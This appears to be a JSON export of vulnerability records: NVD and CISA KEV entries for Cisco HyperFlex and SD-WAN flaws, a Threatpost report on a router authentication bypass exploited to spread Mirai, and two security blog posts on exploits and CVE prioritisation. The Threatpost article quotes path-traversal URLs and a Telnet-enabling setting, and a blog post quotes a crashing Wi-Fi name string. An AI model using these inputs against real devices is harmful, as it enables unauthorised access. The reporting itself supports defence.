["cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.5\\(2a\\):*:*:*:*:*:*:*"]}, {"lastseen": "2022-08-05T19:23:13", "description": "Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an authenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1468", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1468"], "modified": "2022-08-05T16:15:00", "cpe": [], "id": "CVE-2021-1468", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1468", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T12:53:23", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-06T13:15:00", "type": "cve", "title": "CVE-2021-1497", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497"], "modified": "2021-06-07T20:57:00", "cpe": ["cpe:/o:cisco:hyperflex_hx_data_platform:4.0\\(2a\\)"], "id": "CVE-2021-1497", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1497", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:hyperflex_hx_data_platform:4.0\\(2a\\):*:*:*:*:*:*:*"]}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco HyperFlex HX Command Injection Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1498"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-1498", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco HyperFlex HX Command Injection Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-1497", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-08-09T19:54:43", "description": "An authentication-bypass vulnerability affecting multiple routers and internet-of-things (IoT) devices is being actively exploited in the wild, according to researchers.\n\nThe security flaw, tracked as CVE-2021-20090, was disclosed last week by researchers at Tenable. It affects devices from 20 different vendors and ISPs (ADB, Arcadyan, ASMAX, ASUS, Beeline, British Telecom, Buffalo, Deutsche Telekom, HughesNet, KPN, O2, Orange, Skinny, SparkNZ, Telecom [Argentina], TelMex, Telstra, Telus, Verizon and Vodafone), all of which use the same firmware from Arcadyan. In all, millions of devices worldwide could be vulnerable.\n\nTenable [demonstrated](<https://www.tenable.com/security/research/tra-2021-13>) in a proof of concept (PoC) that it\u2019s possible to modify a device\u2019s configuration to enable Telnet on a vulnerable router and gain root level shell access to the device.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe vulnerability exists due to a list of folders which fall under a \u2018bypass list\u2019 for authentication,\u201d according to Tenable\u2019s advisory on August 3. \u201cFor most of the devices listed, that means that the vulnerability can be triggered by multiple paths. For a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\n * http://<ip>/images/..%2findex.htm\n * http://<ip>/js/..%2findex.htm\n * http://<ip>/css/..%2findex.htm\n\n\u201cTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal,\u201d the advisory continued.\n\n## **Exploited to Spread Mirai Variant**\n\nJust three days after disclosure, on Friday, cybersecurity researchers from Juniper Networks said they had discovered active exploitation of the bug.\n\n\u201cWe have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,\u201d they wrote [in a post](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>). \u201cThe attacker seems to be attempting to deploy a [Mirai variant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) on the affected routers.\u201d\n\nCleaving close to Tenable\u2019s PoC, the attackers are modifying the configuration of the attacked device to enable Telnet using \u201cARC_SYS_TelnetdEnable=1\u201d to take control, according to Juniper. Then, they proceed to download the Mirai variant from a command-and-control (C2) server and execute it.\n\nMirai is a long-running botnet that infects connected devices and can be used to mount distributed denial-of-service (DDoS) attacks. It [burst on the scene](<https://threatpost.com/mirai-masterminds-helping-fbi-snuff-out-cybercrime/137556/>) in 2016, when it overwhelmed servers at the Dyn web hosting company, taking down more than 1,200 websites, including Netflix and Twitter. Its source code [was leaked](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) later that year, after which multiple Mirai variants began to crop up, in a barrage that continues to this day.\n\nSome of the scripts in the current set of attacks bear resemblance to previously observed activity picked up in February and March, according to Juniper.\n\n\u201cThe similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\u201d researchers wrote. \u201cGiven that most people may not even be aware of the security risk and won\u2019t be upgrading their device anytime soon, this attack tactic can be very successful, cheap and easy to carry out.\u201d\n\nIn addition to the router bug, Juniper researchers observed the following known vulnerabilities being exploited to gain initial access to target devices:\n\n * CVE-2020-29557 (DLink routers)\n * CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)\n * CVE-2021-31755 (Tenda AC11)\n * CVE-2021-22502 (MicroFocus OBR)\n * CVE-2021-22506 (MicroFocus AM)\n\nIn fact, the attackers have been continuously adding new exploits to its arsenal, according to the posting, and CVE-2021-20090 is unlikely to be the last.\n\n\u201cIt is clear that threat actors keep an eye on all disclosed vulnerabilities,\u201d researchers concluded. \u201cWhenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks.\u201d\n\nTo avoid compromise, users should update their firmware on the router.\n\n\u201cIn the case of IoT devices or home gateways, the situation is much worse as most users are not tech-savvy and even those who are do not get informed about potential vulnerabilities and patches to apply,\u201d according to Juniper. \u201cThe only sure way to remedy this issue is to require vendors to offer zero-down-time automatic updates.\u201d\n\n**Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T19:41:30", "type": "threatpost", "title": "Auth Bypass Bug Exploited, Millions of Routers Affected", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-09T19:41:30", "id": "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "href": "https://threatpost.com/auth-bypass-bug-routers-exploited/168491/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello, today I want to experiment with a new format. I will be reading last week's news from my [@avleonovnews](<https://t.me/avleonovnews>) channel, which I found the most interesting. I do this mostly for myself, but if you like it too, then that would be great. Please subscribe to [my YouTube channel](<https://www.youtube.com/channel/UCSenC-btyVAexgSwvVtxQkg>) and my Telegram [@avleonovcom](<https://t.me/avleonovcom>).\n\nLet's start with some new public exploits.\n\n 1. Researchers at Positive Technologies [have dropped a proof-of-concept (PoC) exploit](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>) on Twitter for a known cross-site scripting (XSS) vulnerability in the Cisco Adaptive Security Appliance (ASA) CVE-2020-3580. This flaw was patched in October. There are reports of researchers pursuing bug bounties using this exploit. Maybe you should do this too. Well, or at least ask your IT administrators if they have updated the ASA.\n 2. [F5 BIG-IQ VE Post-auth Remote Root RCE](<https://vulners.com/packetstorm/PACKETSTORM:163264>). BIG-IQ provides a single point of management for all your BIG-IP devices \u2014 whether they are on premises or in a public or private cloud. It was possible to execute commands with root privileges as an authenticated privileged user via command injection in easy-setup-test-connection. A good reason to check if you have this in the infrastructure. But of course the fact that this is Post-auth makes it less interesting.\n 3. [VMware vCenter 6.5 / 6.7 / 7.0 Remote Code Execution](<https://vulners.com/packetstorm/PACKETSTORM:163268>). From the description of the vulnerability that was published in February 2021. "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server." Therefore, if your IT colleagues have not patched vCenter since February, you can try to demonstrate how this vulnerability is exploited in practice.\n 4. [Solaris SunSSH 11.0 Remote Root](<https://vulners.com/packetstorm/PACKETSTORM:163232>). "CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6". If you are still using Solaris in your infrastructure, this is a great opportunity to try this exploit.\n 5. [Dlink DSL2750U - 'Reboot' Command Injection](<https://vulners.com/packetstorm/PACKETSTORM:163228>). There, in the exploit code, [there is a link to the full study](<https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20\\(firmware%20version%201.6\\)>) that shows how the researcher, Mohammed Hadi, gains admin access to the router. This is interesting considering that this router model is quite popular and you can still buy such a router.\n 6. [It's 2021 and a printf format string in a wireless network's name can break iPhone Wi-Fi](<https://www.theregister.com/2021/06/21/wifi_ssid_flaw/>). On Friday, Carl Schou, a security researcher in Denmark, reported that his iPhone lost its Wi-Fi capability after attempting to connect to a Wi-Fi network named "%p%s%s%s%s%n". Fortunately, the damage appears not to be permanent. Apple iOS devices that lose Wi-Fi capability after being bitten by this bug can be restored via the General -> Reset -> Reset Network Settings menu option, which reverts network settings to their factory default. Not a very interesting vulnerability in terms of practical exploitation, but fun. Don't connect to unfamiliar Wi-Fi networks.\n\nNow let's see some interesting new vulnerabilities.\n\n 1. [Critical Palo Alto Cyber-Defense Bug Allows Remote \u2018War Room\u2019 Access](<https://threatpost.com/critical-palo-alto-bug-remote-war-room/167169/>). "A critical security bug in Palo Alto Networks\u2019 Cortex XSOAR could allow remote attackers to run commands and automations in the Cortex XSOAR War Room and to take other actions on the platform, without having to log in. Found internally by Palo Alto, the bug (CVE-2021-3044) is an improper-authorization vulnerability that \u201cenables a remote unauthenticated attacker with network access to the Cortex XSOAR server to perform unauthorized actions through the REST API,\u201d according to the security vendor\u2019s Tuesday advisory.\n 2. [Cisco HyperFlex HX Auth Handling Remote Command Execution](<https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution>). Cisco HyperFlex HX Data Platform is a high-performance, extensible distributed file system that supports multiple hypervisors with a wide range of enterprise-grade data management and optimization services. If you have this in use, pay attention.\n 3. "VMware has rolled out security updates to resolve a [critical flaw affecting Carbon Black App Control](<https://thehackernews.com/2021/06/critical-auth-bypass-bug-affects-vmware.html>) that could be exploited to bypass authentication and take control of vulnerable systems." Carbon Black Protection (Cb App Control), formerly Bit9, is an application control product that allows departments to monitor and control application execution on systems.\n 4. [NVIDIA Jetson Chipsets Found Vulnerable to High-severity Flaws](<https://thehackernews.com/2021/06/nvidia-jetson-chipsets-found-vulnerable.html>). The NVIDIA Jetson line consists of embedded Linux AI and computer vision compute modules and developer kits that primarily caters to AI-based computer vision applications and autonomous systems such as mobile robots and drones.\n 5. On June 22, SonicWall published an advisory (SNWLID-2021-0006) to address an [incomplete fix for a vulnerability in its operating system](<https://www.tenable.com/blog/cve-2021-20019-sonicwall-fixes-incomplete-patch-for-cve-2020-5135>), SonicOS, used in a variety of SonicWall network security devices, including their SSL VPNs.\n\nMalware:\n\n 1. Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called ["DarkRadiation"](<https://thehackernews.com/2021/06/wormable-darkradiation-ransomware.html>) that's implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications. "The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions," researchers from Trend Micro said in a report published last week. "The malware uses OpenSSL's AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram's API to send an infection status to the threat actor(s)."\n\nSome statistics for your presentations:\n\n 1. [ Time to patch increases significantly during pandemic](<https://www.computerweekly.com/news/252502887/Time-to-patch-increases-significantly-during-pandemic>). "Among some of the headline findings in the data was a sharp decrease in the frequency with which disclosed vulnerabilities are patched in under 24 hours \u2013 which dropped from 20% last year to 9.9% today \u2013 despite new vulnerabilities or zero-days being quickly exploited by malicious actors, as has been seen in many cases, even before disclosure. The survey also found that about 60% of organisations take more than 72 hours to patch, and more than 20% take over 30 days, giving malicious actors a wide-open window to take advantage of the disclosed vulnerabilities to get inside target networks, establish persistence, steal data, and drop malware or ransomware."\n 2. ['Set it and forget it' attitude to open-source software has become a major security problem, says Veracode](<https://www.theregister.com/2021/06/22/third_party_libraries_veracode/>). 92 per cent of the flaws discovered in third-party libraries could be fixed by simply updating to the latest version, with two-thirds of fixes being "minor and non-disruptive to the functionality of even the most complex software applications." The report also highlighted that a slim majority, 52 per cent, of developers claimed to have a formal process for the selection of third-party libraries, with a quarter saying they are either unsure or unaware of the existence of such a process, and that "security" is the third biggest concern when selecting a library \u2013 with "functionality" and "licensing" topping the leader board.\n\nPromising topic:\n\n 1. Google on Thursday [introduced a unified vulnerability schema for open source projects](<https://www.theregister.com/2021/06/24/google_security_fix/>), continuing its current campaign to shore up the security of open source software. A schema defines the structure of a database. It's a blueprint for the objects within the database and it informs how data can be queried and exchanged. As Google describes it, existing naming systems like the CPE Product Dictionary don't provide an easy way to automatically map a CVE vulnerability listing to a package name and a set of versions in a package manager. "With this schema we hope to define a format that all vulnerability databases can export." Well, let's keep an eye on this.\n\nWell, it would probably be worth ending with the words about John McAfee.\n\n[Anti-virus Pioneer John McAfee Found Dead in Spanish Prison Cell](<https://www.infosecurity-magazine.com/news/john-mcafee-found-dead-in-prison/>). I do not presume to say anything about the crimes of which he was accused. In any case, he was an information security legend and his whole life was cooler than any Hollywood blockbuster. I recommend watching videos on [his YouTube channel](<https://www.youtube.com/user/officialjohnmcafee>) about attack attribution and the current state of infrastructure security. He said some pretty unpopular things. And some of them are very interesting. The way it ended is of course very sad and tragic. RIP. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-28T10:59:53", "type": "avleonov", "title": "Last Week\u2019s Security news: Cisco ASA, BIG-IQ, vSphere, Solaris, Dlink, iPhone %s, DarkRadiation, Google schema, John McAfee", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14871", "CVE-2020-3580", "CVE-2020-5135", "CVE-2021-1497", "CVE-2021-20019", "CVE-2021-3044"], "modified": "2021-06-28T10:59:53", "id": "AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9", "href": "http://feedproxy.google.com/~r/avleonov/~3/S3dBKHSK6BE/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-23T15:44:06", "description": "Hello everyone! This episode will be about the new hot twenty vulnerabilities from CISA, NSA and FBI, [Joint cybersecurity advisory (CSA) AA22-279A](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>), and how I analyzed these vulnerabilities using my open source project [Vulristics](<https://github.com/leonov-av/vulristics>). \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239105>\n\nAmericans can't just release a list of "20 vulnerabilities most commonly exploited in attacks on American organizations." They like to add geopolitics and point the finger at some country. Therefore, I leave the attack attribution mentioned in the advisory title without comment.\n\nBut I like such lists of vulnerabilities for a number of reasons:\n\n * Such lists of **vulnerabilities** show which CVEs need to be addressed. This is the most obvious. If you notice vulnerabilities from the list in your infrastructure, start fixing them as soon as possible.\n * Such lists of vulnerabilities show the **software and hardware products** that are most important to monitor. This means that your vulnerability scanner must support this software very well. Make sure you can verify this.\n * Such lists of vulnerabilities show **groups of software and hardware products **that need to be monitored first. Usually these are products that are available to a wide range of users and are inconvenient to upgrade.\n * Such lists of vulnerabilities show **the types of vulnerabilities** that you need to pay attention to first.\n * Such lists of vulnerabilities are relatively compact and **can be easily analyzed** even manually.\n\nI can't help but notice that the quality of the advisory is not very high. For example, the description of vulnerabilities was automatically taken from NVD. Including this: \n\n"Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078". \n\nNot very informative, right? This joint advisory was released by three big serious organizations. They could work harder and write a unique text for each of the 20 CVEs. But no one seems to care.\n\nHere is a list of all vulnerabilities from the advisory:\n\n 1. Apache Log4j CVE-2021-44228 Remote Code Execution\n 2. Pulse Connect Secure CVE-2019-11510 Arbitrary File Read\n 3. GitLab CE/EE CVE-2021-22205 Remote Code Execution\n 4. Atlassian CVE-2022-26134 Remote Code Execution\n 5. Microsoft Exchange CVE-2021-26855 Remote Code Execution\n 6. F5 Big-IP CVE-2020-5902 Remote Code Execution\n 7. VMware vCenter Server CVE-2021-22005 Arbitrary File Upload\n 8. Citrix ADC CVE-2019-19781 Path Traversal\n 9. Cisco Hyperflex CVE-2021-1497 Command Line Execution\n 10. Buffalo WSR CVE-2021-20090 Relative Path Traversal\n 11. Atlassian Confluence Server and Data Center CVE-2021-26084 Remote Code Execution\n 12. Hikvision Webserver CVE-2021-36260 Command Injection\n 13. Sitecore XP CVE-2021-42237 Remote Code Execution\n 14. F5 Big-IP CVE-2022-1388 Remote Code Execution\n 15. Apache CVE-2022-24112 Authentication Bypass by Spoofing\n 16. ZOHO CVE-2021-40539 Remote Code Execution\n 17. Microsoft CVE-2021-26857 Remote Code Execution\n 18. Microsoft CVE-2021-26858 Remote Code Execution\n 19. Microsoft CVE-2021-27065 Remote Code Execution\n 20. Apache HTTP Server CVE-2021-41773 Path Traversal\n\nOf course, I did not deny myself the pleasure of using this list of CVEs as input for my [Vulristics vulnerability prioritization tool](<https://github.com/leonov-av/vulristics>). Just to see how Vulristics handles it and tweak Vulristics if needed.\n\nHere is the command I used to generate the report:\n \n \n $ python3.8 vulristics.py --report-type \"cve_list\" --cve-project-name \"AA22-279A\" --cve-list-path joint_cves.txt --cve-data-sources \"ms,nvd,vulners,attackerkb\" --cve-comments-path comments.txt --rewrite-flag \"True\"\n\nThe full report is here: <https://avleonov.com/vulristics_reports/aa22-279a_report_with_comments_ext_img.html>\n\n## Vulnerable Products\n\nIf you look at the list of vulnerable software and hardware products, then some of them, obviously, should have been included in this advisory. Because lately there have been a lot of publications about how attackers exploit the vulnerabilities in these products:\n\n * Apache HTTP Server\n * Apache Log4j2\n * GitLab\n * Microsoft Exchange\n * Confluence Server\n * Zoho ManageEngine ADSelfService Plus\n * Pulse Connect Secure\n\nThe second group of products. For them, there were also publications about attacks. But it seems that these are more niche products and are less perceived as targets for attackers:\n\n * BIG-IP\n * Citrix Application Delivery Controller\n * VMware vCenter\n * Cisco HyperFlex HX\n\nAnd finally, there are quite exotic products that apparently reflect the specifics of American IT:\n\n * Sitecore Experience Platform (XP)\n * Hikvision Web Server\n * Apache APISIX\n * Buffalo WSR\n\n## Criticality of Vulnerabilities\n\nVulristics has identified all vulnerabilities as vulnerabilities of the highest criticality level (Urgent). Vulristics found public exploits for all vulnerabilities.\n\nAt the same time, if you look at CVSS, then there is this:\n\nAll vulnerabilities: 20 \nCritical: 16 \nHigh: 4 \nMedium: 0 \nLow: 0\n\nSo if you are using CVSS for prioritization, don't forget about the High level vulnerabilities.\n\n## Detected Types of Vulnerabilities\n\n * Remote Code Execution\n * Command Injection\n * Arbitrary File Reading\n * Authentication Bypass\n * Path Traversal\n\nAs we can see, all vulnerabilities are obviously critical except for one "Path Traversal":\n\nPath Traversal - Citrix Application Delivery Controller (CVE-2019-19781)\n\nThe description of the vulnerability leaves no room for detecting another type:\n\n"An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal".\n\nThe same type is indicated in the advisory AA22-279A: Citrix ADC CVE-2019-19781 Path Traversal\n\nAnd only [in the description of the exploit](<https://github.com/trustedsec/cve-2019-19781>) we can see that this is in fact RCE: "This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for **remote code execution**."\n\nWell, this is another reminder to us that we should not do hard filtering by vulnerability type. It's also not a good idea to trust the description from NVD. The type of vulnerability may change over time, and no one will make changes to the description in NVD.\n\nIn some cases, Vulristics can help to more accurately determine the type of vulnerability:\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773)\n\nWhy? Because we can read in the description: "If CGI scripts are also enabled for these aliased pathes, this could allow for **remote code execution**."\n\nBut of course Vulristics is not a silver bullet. It is difficult to come up with something here other than manual analysis of publications about vulnerabilities and exploits.\n\nI also cannot help but point out that for some of the vulnerabilities, Vulrisitcs determined the types of vulnerabilities more correctly in accordance with the description:\n\nAA22-279A: GitLab CE/EE CVE-2021-22205 Remote Code Execution \nVulristics: Command Injection - GitLab (CVE-2021-22205) - Urgent [947] \n"\u2026 which resulted in a **remote command execution**."\n\nAA22-279A: Sitecore XP CVE-2021-42237 Remote Code Execution \nVulristics: Command Injection - Sitecore Experience Platform (XP) (CVE-2021-42237) \n"\u2026 it is possible to achieve **remote command execution** on the machine."\n\nAA22-279A: VMware vCenter Server CVE-2021-22005 Arbitrary File Upload \nVulristics: Remote Code Execution - VMware vCenter (CVE-2021-22005) \n"\u2026may exploit this issue **to execute code** on vCenter Server by uploading a specially crafted file."\n\nAA22-279A: F5 Big-IP CVE-2022-1388 Remote Code Execution \nVulristics: Authentication Bypass - BIG-IP (CVE-2022-1388) \n\u2026 undisclosed requests **may bypass** iControl REST **authentication**"\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773) \n"\u2026 this could allow for **remote code execution**."\n\nAA22-279A: Apache CVE-2022-24112 Authentication Bypass by Spoofing \nVulristics: Remote Code Execution - Apache APISIX (CVE-2022-24112) \n"\u2026 is vulnerable to **remote code execution**."\n\nAA22-279A: Buffalo WSR CVE-2021-20090 Relative Path Traversal \nVulristics: Authentication Bypass - Buffalo WSR (CVE-2021-20090) \n"\u2026 allow unauthenticated remote attackers to **bypass authentication**."\n\nTherefore, do not rush to trust the vulnerability type from the [CISA Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and take it into account when prioritizing vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 